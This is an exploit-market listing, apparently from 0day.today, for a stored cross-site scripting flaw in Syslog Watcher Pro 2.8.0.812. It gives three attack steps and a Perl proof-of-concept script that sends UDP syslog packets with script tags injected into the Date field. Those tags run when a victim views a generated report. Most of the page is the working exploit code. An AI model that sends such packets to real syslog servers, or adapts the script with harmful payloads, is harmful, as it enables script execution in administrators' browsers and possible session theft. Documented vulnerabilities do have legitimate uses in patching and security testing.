[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - CSS Vulnerability

Author
demonalex
Risk
[
Security Risk High
]
0day-ID
0day-ID-20719
Category
dos / poc
Date add
01-05-2013
Platform
windows
How to Attack :
STEP 1: Send a syslog packet which contained XSS code into 'Date' Parameter to Syslog Watcher Pro.
STEP 2: Syslog Watcher Pro put XSS code into database.
STEP 3: XSS code will be executed after victim generate and view report by Syslog Watcher Pro.
 
Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl
use IO::Socket::INET;
$|=1;
 
$host=shift;
$port=shift;
 
if(defined($host) && defined($port)){
  ;
}else{
  die "usage: $0 host port\n";
}
 
$con=new IO::Socket::INET->new(PeerPort=>$port,
        Proto=>'udp',
        PeerAddr=>$host);
 
$npriority = '<0>';
$nhostname = "10.0.0.2";
$npid = 'test[10]';
$nmsg = "testing by demonalex";
 
$testcase1="<script>alert(\"XSS1\")</script>";
$testcase2="<script>alert(/XSS2/)</script>";
 
#testcase1
$header = $testcase1.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
 
#testcase2
$header = $testcase2.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
 
$con->close;
 
print "Over!\n";
 
exit(1);

#  0day.today [2024-12-24]  #